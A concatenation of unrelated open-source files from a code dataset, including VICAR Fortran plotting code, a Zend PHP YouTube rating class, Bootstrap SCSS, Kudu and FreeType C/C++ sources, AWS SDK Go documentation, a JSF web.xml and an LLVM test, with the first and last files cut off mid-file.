SIGMA=SIGMA+DBLV*DBLV
SN=SN+SINC
150 CONTINUE
c print *,"HORIZONTAL LINE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
c print *,"mean, sigma"
c print *, mean,sigma
GO TO 500
C
C VERTICAL LINE
200 continue
NPTS=IABS(EL-SL)+1
DO 250 IPT=1,NPTS
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',2,'INP',IN,STAT)
Y(IPT)=RBUF(SN)
DBLV=Y(IPT)
MEAN=MEAN+DBLV
SIGMA=SIGMA+DBLV*DBLV
LN=LN+LINC
250 CONTINUE
c print *,"VERTICAL LINE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
c print *,"mean, sigma summations"
c print *, mean,sigma
GO TO 500
C
C SLANT LINE
300 continue
NX=IABS(SS-ES)
NY=IABS(SL-EL)
NPTS=IFIX(SQRT(FLOAT(NY*NY+NX*NX)))+1
DZ=ATAN2(FLOAT(NY),FLOAT(NX))
ADX=COS(DZ)
ADY=SIN(DZ)
DX=0.0
DY=0.0
C
DO 350 IPT=1,NPTS
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',3,'INP',IN,STAT)
YT(1)=RBUF(SN)
YT(2)=RBUF(SN+SINC)
C READ NEXT LINE OF DATA (EXCEPT FOR FIRST OR LAST POINT -
C IN THAT CASE READ SAME LINE)
LN2=LN+LINC
IF (IPT .EQ. 1 .OR. IPT .EQ. NPTS) LN2=LN
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN2,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',4,'INP',IN,STAT)
YT(3)=RBUF(SN)
YT(4)=RBUF(SN+SINC)
C
Y(IPT)=YT(1)+DX*(YT(2)-YT(1))+DY*(YT(3)+DX*(YT(4)-YT(3))-YT(1)
& -DX*(YT(2)-YT(1)))
DBLV=Y(IPT)
MEAN=MEAN+DBLV
SIGMA=SIGMA+DBLV*DBLV
C
C CHECK FOR LINE/SAMPLE INCREMENTING
DX=DX+ADX
DY=DY+ADY
IF (DX .LT. 1.0) GO TO 330
C INCREMENT SAMPLE NUMBER
SN=SN+SINC
DX=DX-1.0
IF (DY .LT. 1.0) GO TO 350
C INCREMENT LINE NUMBER
330 LN=LN+LINC
DY=DY-1.0
350 CONTINUE
cc print *,"SLANT LINE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
c print *,"mean, sigma"
c print *, mean,sigma
GO TO 500
C
C SPECTRAL PLOT
400 continue
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,' ')
C CALL XVCHECK('XVREAD ',5,'INP',IN,STAT)
NPTS=NCHAN
DO 450 IPT=1,NPTS
Y(IPT)=RBUF((IPT-1)*NSCHAN+SN)
DBLV=Y(IPT)
MEAN=MEAN+DBLV
SIGMA=SIGMA+DBLV*DBLV
450 CONTINUE
C
C
C SCALE DATA ACCORDING TO YVALUES PARAMETERS
500 continue
DNMAX=255.0
IF (FORMAT(IN) .EQ. 'HALF') DNMAX=32767.0
IF (FORMAT(IN) .EQ. 'FULL') DNMAX=65536.0
IF (FORMAT(IN) .EQ. 'REAL') DNMAX=65536.0
YINC=(YMAX(ILINE)-YMIN(ILINE))/DNMAX
yinc = 1.0
IF ((YINC .EQ. 1.) .AND. (YMIN(ILINE) .EQ. 0.)) GO TO 620
DO 610 ID=1,NPTS
Y(ID)=Y(ID)*YINC+YMIN(ILINE)
610 CONTINUE
cc print *,"scale to YVALUES:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C SCALE DATA ACCORDING TO RDS PARAMETER
620 continue
IF (RDS .EQ. 0) GO TO 630
DO 625 ID=1,NPTS
Y(ID)=SQRT(AMAX1(Y(ID)**2-RDS**2,0.))
625 CONTINUE
cc print *,"scale to RDS:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C NORMALIZE DATA
630 continue
IF (.NOT.NORM) GO TO 640
YPEAK=Y(1)
DO 635 ID=2,NPTS
IF (YPEAK .LT. Y(ID)) YPEAK=Y(ID)
635 CONTINUE
DO 638 ID=1,NPTS
Y(ID)=Y(ID)/YPEAK
638 CONTINUE
cc print *,"NORMALIZE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C ADD DISPLACEMENT
640 continue
IF (displace .NE. 0.) then
DO ID=1,NPTS
Y(ID)=Y(ID)+INTEQ*displace
ENDDO
ENDIF
cc print *,"ADD DISPLACEMENT:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C COMPUTE MEAN AND STANDARD DEVIATION
MEAN=MEAN/NPTS
SIGMA=DSQRT(DABS(SIGMA/NPTS-MEAN*MEAN))
c print *, "MEAN, STDDEV:"
c print *, mean,sigma
C
C LOAD X ARRAY
X(1)=XMIN(ILINE)
XINC=(XMAX(ILINE)-XMIN(ILINE))/(NPTS-1)
c print *, "LOAD X-ARRAY INCREMENT xinc = ",xinc
IF (XINC .NE. 0.) GO TO 660
X(1)=1.
XINC=1.
660 DO 665 IQ=2,NPTS
X(IQ)=X(IQ-1)+XINC
665 CONTINUE
c now append XSCLMN and XSCLDT to X array
X(NPTS+1)=XSCLMN
X(NPTS+2)=XSCLDT
C
c
c print *,'ysclset, xsclset = ',ysclset,xsclset
if (.not.ysclset) then
DO ID=1,NPTS
cc print *,ID,Y(ID),YSCLMX,YSCLMN
IF (Y(ID) .GT. YSCLMX) YSCLMX=Y(ID) !bug here, reversed
IF (Y(ID) .LT. YSCLMN) YSCLMN=Y(ID)
ENDDO
endif
c X in VICAR IMAGE Always starts at 1,1
if (.not.xsclset) then
c xsclmn = 1
DO ID=1,NPTS
IF (X(ID) .GT. XSCLMX) XSCLMX=X(ID) !bug here, reversed
IF (X(ID) .LT. XSCLMN) XSCLMN=X(ID)
ENDDO
endif
c
cc print *, "ysclmn, ysclmx = ",ysclmn, ysclmx
cc print *, "tysclmn, tysclmx = ",tysclmn, tysclmx
cc print *, "xsclmn, xsclmx = ",xsclmn, xsclmx
cc print *, "txsclmn, txsclmx = ",txsclmn, txsclmx
c
if (line .gt. 1) then
if (txsclmn .lt. xsclmn) xsclmn = txsclmn
if (txsclmx .gt. xsclmx) xsclmx = txsclmx
if (tysclmn .lt. ysclmn) ysclmn = tysclmn
if (tysclmx .gt. ysclmx) ysclmx = tysclmx
endif
c
cc print *, "ysclmn, ysclmx = ",ysclmn, ysclmx
cc print *, "xsclmn, xsclmx = ",xsclmn, xsclmx
c
c now append YSCLMN and YSCLDT to Y array
Y(NPTS+1)=YSCLMN
Y(NPTS+2)=YSCLDT
IDENSE=NPTS/XLNGTH
IF (NLINES .EQ. 1) IDENSE=0
C
!! Set SCALE factor to 1.0, as XRT/graph will automatically scale
!! the X & Y values before displaying the values.
x(npts+2) = 1.0
y(npts+2) = 1.0
ccc--- CALL LINE (X,Y,NPTS,1,IDENSE,INTEQ)
!! Move to (0,0) and set new origin
ccc--- call setactiveset (0)
ccc--- call plot (0.0, 0.0, 3)
TAB=CHAR(9)
ccccc tbl=tbl(1:ntbl)//num(iline)
ccccc ntbl=index(tbl,' ') - 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(line)
ntbl=index(tbl,' ') - 1
c print *, 'before OPEN(99,FILE=TBL( tbl = ',tbl(1:ntbl)
OPEN(99,FILE=TBL(1:ntbl),STATUS='UNKNOWN',IOSTAT=J,ERR=998)
do i=1,npts
10100 format (1x,f8.0,a1,f10.3)
WRITE(99,FMT=10100,IOSTAT=J,ERR=998) x(i),tab, y(i)
enddo
CLOSE(99)
C
C
C **********************************************************
C
C * LABEL PROCESSING *
C
inline = 1
YPAGE=AMAX1(7.,YLNGTH)
IF (LABTOP .EQ. 1) YPAGE=11.5
XL2=0.
XL1=0
IF (SIZE .EQ. 0.) GO TO 800
C CHECK IF SAME DATA SET
IF(LB.EQ.0) GO TO 710
headermsg (iiline) = 'SAME LABELS'
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
inline =inline + 1
YPAGE = YPAGE-2.0*SIZE
GO TO 730
C
C GET LABELS
710 continue
CALL LABGET(UNIT(IN),NLAB,LABEL)
C PRINT LABELS
xheadermsg = ' '
write (xheadermsg (1:),'(a)') 'Line '
write (xheadermsg (6:),'(i2)') ILINE
write (xheadermsg (9:),'(a)') ' - '
write (xheadermsg (12:50),'(a)') filename(iline)(1:38)
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
DO 720 ILAB=1,NLAB
C CALL SYMBOL(XPAGE,YPAGE,SIZE,%DESCR(LABEL(1,ILAB)),0,0.,NCH)
headermsg (iiline) = label(ilab)
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
c print *, 'headermsg = ',headermsg (iiline)
iiline = iiline + 1
720 CONTINUE
C PRINT MEAN AND STANDARD DEVIATION
730 continue
write (xheadermsg (1:),'(a)') stlab1 !! 'AVE GRAY SCALE = '
write (xheadermsg (18:),'(f8.2)') mean
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
write (xheadermsg (1:),'(a)') stlab2 !! 'STD DEV = '
write (xheadermsg (11:),'(f6.2)') sigma
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
C PRINT SL, SS, EL, ES
IF(GTYPE.EQ.1) THEN
write (xheadermsg (1:),'(a)') 'SL='
write (xheadermsg (4:),'(i3)') SL
write (xheadermsg (11:),'(a)') 'SS='
write (xheadermsg (14:),'(i3)') SS
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
write (xheadermsg (1:),'(a)') 'EL='
write (xheadermsg (4:),'(i3)') el
write (xheadermsg (11:),'(a)') 'EL='
write (xheadermsg (14:),'(i3)') es
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
c print *,'header = ',headermsg(iiline)(1:nheadermsg (iiline))
iiline = iiline + 1
ELSE
write (xheadermsg (1:),'(a)') 'LINE='
write (xheadermsg (4:),'(f6.2)') float(ln)
write (xheadermsg (11:),'(a)') 'SAMPLE='
write (xheadermsg (44:),'(f6.2)') float(sn)
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
c print *,'header = ',headermsg(iiline)(1:nheadermsg (iiline))
iiline = iiline + 1
END IF
C
800 XL=AMAX1(XL1-XPAGE,XL2-XPAGE)
XPAGE=XPAGE+XL+0.5
iiline = iiline + 1 !! Bump index for header strings
C
RETURN
998 call xvmessage('??E - Error writing gnuplot file - graph',' ')
call abend
return
END
C
C
C
C **********************************************************
C
C
C
SUBROUTINE LABGET(UNIT,NLAB,LABEL)
implicit none
INTEGER*4 INSTAN(200),STAT,UNIT,COUNT,NLAB
integer*4 i,j,ichar,ilab,length,lvalue,ntasks
CHARACTER*500 VALUE
CHARACTER*32 FORMAT
CHARACTER*28 TIME,LTIME
CHARACTER*8 TASKS(200),UNAME,LUNAME
CHARACTER*32 KEY,LKEY
CHARACTER*1600 LTASKS
C LOGICAL*1 LTASKS(1600),LUNAME(8),LKEY(32)
CHARACTER*56 LABEL(20)
C LOGICAL*1 LABEL(56,20),LTIME(28),LVALUE(500)
EQUIVALENCE (TASKS,LTASKS),(UNAME,LUNAME),(TIME,LTIME)
EQUIVALENCE (KEY,LKEY),(VALUE,LVALUE)
C BLANK OUT LABEL BUFFER AND INITIALIZE LABEL POINTER
DO I=1,20
LABEL(I) = ' '
ENDDO
C CALL MVE(1,20*56,' ',LABEL,0,1)
ILAB=1
NTASKS=200
C
C GET NAMES OF ALL HISTORY TASKS
CALL XLHINFO(UNIT,TASKS,INSTAN,NTASKS,STAT,' ')
C CALL XVCHECK('XLHINFO ',1,'INP',UNIT,STAT)
C
DO 200 I=1,NTASKS
C GET USER AND TIME
CALL XLGET(UNIT,'HISTORY','USER',UNAME,STAT,'HIST',TASKS(I),
& 'INSTANCE',INSTAN(I),'FORMAT','STRING',' ')
C CALL XVCHECK('XLGET ',1,'INP',UNIT,STAT)
CALL XLGET(UNIT,'HISTORY','DAT_TIM',TIME,STAT,'HIST',
& TASKS(I),'INSTANCE',INSTAN(I),'FORMAT','STRING',' ')
c CALL XVCHECK('XLGET ',2,'INP',UNIT,STAT)
C CONVERT DAT_TIM TO UPPERCASE
CALL CCASE(TIME,1,28)
C FILL IN TASK, USER, TIME LINE
C 1 2 3 4 4
C 1234567890123456789012345678901234567890123456789
LABEL(ILAB) = 'TASK: USER: '
WRITE(LABEL(ILAB)(7:14), '(A8)' ) LTASKS(8*I-7:8*I)
WRITE(LABEL(ILAB)(23:30), '(A8)' ) LUNAME
WRITE(LABEL(ILAB)(33:56), '(A24)' ) LTIME
c CALL MVL('TASK:',LABEL(1,ILAB),5)
c CALL MVL(LTASKS(8*I-7),LABEL(7,ILAB),8)
c CALL MVL('USER:',LABEL(17,ILAB),5)
c CALL MVL(LUNAME,LABEL(23,ILAB),8)
c CALL MVL(LTIME,LABEL(33,ILAB),24)
ILAB=ILAB+1
IF (ILAB .GT. 20) GO TO 500
C
C SET TO CURRENT TASK
CALL XLINFO(UNIT,'HISTORY','TASK',FORMAT,LENGTH,COUNT,
& STAT,'HIST',TASKS(I),'INSTANCE',INSTAN(I),' ')
C CALL XVCHECK('XLINFO ',1,'INP',UNIT,STAT)
ICHAR=1
C
DO 100 J=1,999
C GET NEXT KEYWORD
CALL XLNINFO(UNIT,KEY,FORMAT,LENGTH,COUNT,STAT,' ')
IF (STAT .NE. 1 .OR. KEY .EQ. 'TASK') GO TO 150
IF (KEY .EQ. 'DAT_TIM' .OR. KEY .EQ. 'USER') GO TO 100
C GET VALUE
CALL XLGET(UNIT,'HISTORY',KEY,VALUE,STAT,'HIST',TASKS(I),
& 'INSTANCE',INSTAN(I),'FORMAT','STRING',
& 'LENGTH',LENGTH,' ')
c CALL XVCHECK('XLGET ',3,'INP',UNIT,STAT)
C TRUNCATE VALUE IF KEYWORD AND VALUE WILL NOT FIT ON ONE LINE
IF (LENGTH .GT. 47) LENGTH=47
C SEE IF KEYWORD AND VALUE WILL FIT ON PRESENT LINE
IF (ICHAR+LENGTH+9 .LT. 56) GO TO 50
ICHAR=1
ILAB=ILAB+1
IF (ILAB .GT. 20) GO TO 500
C FILL IN KEYWORD AND VALUE INTO LABEL BUFFER
50 WRITE(LABEL(ILAB)(ICHAR:(ICHAR+7)), '(A8)') LKEY
WRITE(LABEL(ILAB)(ICHAR+8:ICHAR+8), '(A1)' ) '='
WRITE(LABEL(ILAB)(ICHAR+9:), '(A)') LVALUE
C CALL MVL(LKEY,LABEL(ICHAR,ILAB),8)
C CALL MVL('=',LABEL(ICHAR+8,ILAB),1)
C CALL MVL(LVALUE,LABEL(ICHAR+9,ILAB),LENGTH)
ICHAR=ICHAR+LENGTH+11
C
100 CONTINUE
150 ILAB=ILAB+1
IF (ILAB .GT. 20) GO TO 500
200 CONTINUE
500 NLAB = ILAB-1
RETURN
END
| {
"pile_set_name": "Github"
} |
<?php
/**
* Zend Framework
*
* LICENSE
*
* This source file is subject to the new BSD license that is bundled
* with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://framework.zend.com/license/new-bsd
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@zend.com so we can send you a copy immediately.
*
* @category Zend
* @package Zend_Gdata
* @subpackage Media
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
* @version $Id: MediaRating.php 20096 2010-01-06 02:05:09Z bkarwin $
*/
/**
* @see Zend_Gdata_Extension
*/
require_once 'Zend/Gdata/Extension.php';
/**
* Represents the media:rating element specific to YouTube.
*
* @category Zend
* @package Zend_Gdata
* @subpackage YouTube
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
*/
class Zend_Gdata_YouTube_Extension_MediaRating extends Zend_Gdata_Extension
{
protected $_rootElement = 'rating';
protected $_rootNamespace = 'media';
/**
* @var string
*/
protected $_scheme = null;
/**
* @var string
*/
protected $_country = null;
/**
* Constructs a new MediaRating element
*
* @param string $text
* @param string $scheme
* @param string $country
*/
public function __construct($text = null, $scheme = null, $country = null)
{
$this->registerAllNamespaces(Zend_Gdata_Media::$namespaces);
parent::__construct();
$this->_scheme = $scheme;
$this->_country = $country;
$this->_text = $text;
}
/**
* Retrieves a DOMElement which corresponds to this element and all
* child properties. This is used to build an entry back into a DOM
* and eventually XML text for sending to the server upon updates, or
* for application storage/persistence.
*
* @param DOMDocument $doc The DOMDocument used to construct DOMElements
* @return DOMElement The DOMElement representing this element and all
* child properties.
*/
public function getDOM($doc = null, $majorVersion = 1, $minorVersion = null)
{
$element = parent::getDOM($doc, $majorVersion, $minorVersion);
if ($this->_scheme !== null) {
$element->setAttribute('scheme', $this->_scheme);
}
if ($this->_country != null) {
$element->setAttribute('country', $this->_country);
}
return $element;
}
/**
* Given a DOMNode representing an attribute, tries to map the data into
* instance members. If no mapping is defined, the name and value are
* stored in an array.
*
* @param DOMNode $attribute The DOMNode attribute needed to be handled
*/
protected function takeAttributeFromDOM($attribute)
{
switch ($attribute->localName) {
case 'scheme':
$this->_scheme = $attribute->nodeValue;
break;
case 'country':
$this->_country = $attribute->nodeValue;
break;
default:
parent::takeAttributeFromDOM($attribute);
}
}
/**
* @return string
*/
public function getScheme()
{
return $this->_scheme;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setScheme($value)
{
$this->_scheme = $value;
return $this;
}
/**
* @return string
*/
public function getCountry()
{
return $this->_country;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setCountry($value)
{
$this->_country = $value;
return $this;
}
}
| {
"pile_set_name": "Github"
} |
/* Update alert message: A new version of {APP NAME} is available. Please update to version {NEW VERSION} now.*/
"A new version of %@ is available. Please update to version %@ now."="نسخه جدید %@ در دسترس است. لطفا همین حالا به نسخه %@ بروزرسانی کنید.";
/* Update alert title */
"Update Available"="بروزرسانی در دسترس";
/* Update alert dismiss button title */
"Next time"="دفعه بعد";
/* Update alert skip button title */
"Skip this version"="رد این نسخه";
/* Update alert skip button title */
"Update"="بروزرسانی";
| {
"pile_set_name": "Github"
} |
// Container widths
//
// Set the container width, and override it for fixed navbars in media queries.
@if $enable-grid-classes {
.container {
@include make-container();
@include make-container-max-widths();
}
}
// Fluid container
//
// Utilizes the mixin meant for fixed width containers, but with 100% width for
// fluid, full width layouts.
@if $enable-grid-classes {
.container-fluid {
@include make-container();
}
}
// Row
//
// Rows contain and clear the floats of your columns.
@if $enable-grid-classes {
.row {
@include make-row();
}
// Remove the negative margin from default .row, then the horizontal padding
// from all immediate children columns (to prevent runaway style inheritance).
.no-gutters {
margin-right: 0;
margin-left: 0;
> .col,
> [class*="col-"] {
padding-right: 0;
padding-left: 0;
}
}
}
// Columns
//
// Common styles for small and large grid columns
@if $enable-grid-classes {
@include make-grid-columns();
}
| {
"pile_set_name": "Github"
} |
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
#pragma once
#include <cstdint>
#include <set>
#include <string>
#include "kudu/gutil/ref_counted.h"
#include "kudu/util/locks.h"
#include "kudu/util/status.h"
namespace kudu {
namespace rpc {
// RequestTracker implementation, inspired by:
// "Implementing Linearizability at Large Scale and Low Latency" by Colin Lee et al.
//
// This generates sequence numbers for retriable RPCs and tracks the ongoing ones.
// The main point of this is to enable exactly-once semantics, i.e. making sure that
// an RPC is only executed once, by uniquely identifying each RPC that is sent to
// the server.
//
// Note that the sequence numbers here are differet from RPC 'call ids'. A call id
// uniquely identifies a call _to a server_. All calls have a call id that is
// assigned incrementally. Sequence numbers, on the other hand, uniquely identify
// the RPC operation itself. That is, if an RPC is retried on another server it will
// have a different call id, but the same sequence number.
//
// By keeping track of the RPCs that are in-flight and which ones are completed
// we can determine the first incomplete RPC. When this information is sent
// to the server it can use it to garbage collect RPC results that it might be
// saving for future retries, since it now knows there won't be any.
//
// This class is thread safe.
class RequestTracker : public RefCountedThreadSafe<RequestTracker> {
public:
typedef int64_t SequenceNumber;
static const RequestTracker::SequenceNumber kNoSeqNo;
explicit RequestTracker(std::string client_id);
// Creates a new, unique, sequence number.
// Sequence numbers are assigned in increasing integer order.
// Returns Status::OK() and sets 'seq_no' if it was able to generate a sequence number
// or returns Status::ServiceUnavailable() if too many RPCs are in-flight, in which case
// the caller should try again later.
Status NewSeqNo(SequenceNumber* seq_no);
// Returns the sequence number of the first incomplete RPC.
// If there is no incomplete RPC returns kNoSeqNo.
SequenceNumber FirstIncomplete();
// Marks the rpc with 'seq_no' as completed.
void RpcCompleted(const SequenceNumber& seq_no);
// Returns the client id for this request tracker.
const std::string& client_id() { return client_id_; }
private:
// The client id for this request tracker.
const std::string client_id_;
// Lock that protects all non-const fields.
simple_spinlock lock_;
// The next sequence number.
SequenceNumber next_;
// The (ordered) set of incomplete RPCs.
std::set<SequenceNumber> incomplete_rpcs_;
};
} // namespace rpc
} // namespace kudu
| {
"pile_set_name": "Github"
} |
/***************************************************************************/
/* */
/* ftgasp.c */
/* */
/* Access of TrueType's `gasp' table (body). */
/* */
/* Copyright 2007 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
#include <ft2build.h>
#include FT_GASP_H
#include FT_INTERNAL_TRUETYPE_TYPES_H
FT_EXPORT_DEF( FT_Int )
FT_Get_Gasp( FT_Face face,
FT_UInt ppem )
{
FT_Int result = FT_GASP_NO_TABLE;
if ( face && FT_IS_SFNT( face ) )
{
TT_Face ttface = (TT_Face)face;
if ( ttface->gasp.numRanges > 0 )
{
TT_GaspRange range = ttface->gasp.gaspRanges;
TT_GaspRange range_end = range + ttface->gasp.numRanges;
while ( ppem > range->maxPPEM )
{
range++;
if ( range >= range_end )
goto Exit;
}
result = range->gaspFlag;
/* ensure that we don't have spurious bits */
if ( ttface->gasp.version == 0 )
result &= 3;
}
}
Exit:
return result;
}
/* END */
| {
"pile_set_name": "Github"
} |
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package eks provides the client and types for making API
// requests to Amazon Elastic Kubernetes Service.
//
// Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service that
// makes it easy for you to run Kubernetes on AWS without needing to stand up
// or maintain your own Kubernetes control plane. Kubernetes is an open-source
// system for automating the deployment, scaling, and management of containerized
// applications.
//
// Amazon EKS runs up-to-date versions of the open-source Kubernetes software,
// so you can use all the existing plugins and tooling from the Kubernetes community.
// Applications running on Amazon EKS are fully compatible with applications
// running on any standard Kubernetes environment, whether running in on-premises
// data centers or public clouds. This means that you can easily migrate any
// standard Kubernetes application to Amazon EKS without any code modification
// required.
//
// See https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01 for more information on this service.
//
// See eks package documentation for more information.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/
//
// Using the Client
//
// To contact Amazon Elastic Kubernetes Service with the SDK use the New function to create
// a new service client. With that client you can make API requests to the service.
// These clients are safe to use concurrently.
//
// See the SDK's documentation for more information on how to use the SDK.
// https://docs.aws.amazon.com/sdk-for-go/api/
//
// See aws.Config documentation for more information on configuring SDK clients.
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config
//
// See the Amazon Elastic Kubernetes Service client EKS for more
// information on creating client for this service.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/#New
package eks
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2016 Red Hat, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.syndesis.server.runtime.swagger;
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import io.swagger.v3.core.jackson.ModelResolver;
import io.swagger.v3.core.util.Json;
import io.swagger.v3.oas.models.media.Schema;
import io.syndesis.common.model.Kind;
/**
* We're using {@link Kind#modelName} as value for the {@link Kind} enum values.
* The OpenAPI document generation has no knowledge of that so this
* {@link ModelResolver} sets {@code enum} values to the values of the
* {@code modelName}.
*/
public final class KindModelResolver extends ModelResolver {
private static final List<String> KINDS;
static {
KINDS = Stream.of(Kind.values())
.map(k -> k.modelName)
.collect(Collectors.toList());
}
public KindModelResolver() {
super(Json.mapper());
}
@Override
protected void _addEnumProps(final Class<?> propClass, @SuppressWarnings("rawtypes") final Schema property) {
if (Kind.class.equals(propClass)) {
@SuppressWarnings("unchecked")
final Schema<String> kindProperty = property;
kindProperty.setEnum(KINDS);
} else {
super._addEnumProps(propClass, property);
}
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
Copyright (c) 1997-2017 Oracle and/or its affiliates. All rights reserved.
The contents of this file are subject to the terms of either the GNU
General Public License Version 2 only ("GPL") or the Common Development
and Distribution License("CDDL") (collectively, the "License"). You
may not use this file except in compliance with the License. You can
obtain a copy of the License at
https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
or packager/legal/LICENSE.txt. See the License for the specific
language governing permissions and limitations under the License.
When distributing the software, include this License Header Notice in each
file and include the License file at packager/legal/LICENSE.txt.
GPL Classpath Exception:
Oracle designates this particular file as subject to the "Classpath"
exception as provided by Oracle in the GPL Version 2 section of the License
file that accompanied this code.
Modifications:
If applicable, add the following below the License Header, with the fields
enclosed by brackets [] replaced by your own identifying information:
"Portions Copyright [year] [name of copyright owner]"
Contributor(s):
If you wish your version of this file to be governed by only the CDDL or
only the GPL Version 2, indicate your decision by adding "[Contributor]
elects to include this software in this distribution under the [CDDL or GPL
Version 2] license." If you don't indicate a single choice of license, a
recipient has the option to distribute your version of this file under
either the CDDL, the GPL Version 2 or to extend the choice of license to
its licensees as provided above. However, if you add GPL Version 2 code
and therefore, elected the GPL Version 2 license, then the option applies
only if the new code is made subject to such option by the copyright
holder.
-->
<web-app version="3.0" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
<context-param>
<param-name>javax.faces.PROJECT_STAGE</param-name>
<param-value>${webapp.projectStage}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.PARTIAL_STATE_SAVING</param-name>
<param-value>${webapp.partialStateSaving}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>${webapp.stateSavingMethod}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.SERIALIZE_SERVER_STATE</param-name>
<param-value>${webapp.serializeServerState}</param-value>
</context-param>
<servlet>
<servlet-name>Faces Servlet</servlet-name>
<servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>Faces Servlet</servlet-name>
<url-pattern>/faces/*</url-pattern>
</servlet-mapping>
<welcome-file-list>
<welcome-file>faces/index.xhtml</welcome-file>
</welcome-file-list>
</web-app>
| {
"pile_set_name": "Github"
} |
These are the functions which can be called on a minecraft:effects_changed criteria
trigger.
addEffect:
Arguments:
String
Usage:
potion type
Notes:
Adds a PotionEffectData for the provided potion type and returns it so functions can be called on it.
| {
"pile_set_name": "Github"
} |
; RUN: opt -strip -S < %s | FileCheck %s
; PR10286
@main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %FOO), i8* blockaddress(@f, %BAR)]
; CHECK: @main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %2), i8* blockaddress(@f, %3)]
declare void @foo() nounwind
declare void @bar() nounwind
define void @f(i8* %indirect.goto.dest) nounwind uwtable ssp {
entry:
indirectbr i8* %indirect.goto.dest, [label %FOO, label %BAR]
; CHECK: indirectbr i8* %0, [label %2, label %3]
FOO:
call void @foo()
ret void
BAR:
call void @bar()
ret void
}
| {
"pile_set_name": "Github"
} |
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('TEST', eras.Run2_2018)
# minimum of logs
process.MessageLogger = cms.Service("MessageLogger",
statistics = cms.untracked.vstring(),
destinations = cms.untracked.vstring("cout"),
cout = cms.untracked.PSet(
threshold = cms.untracked.string("WARNING")
)
)
# raw data source
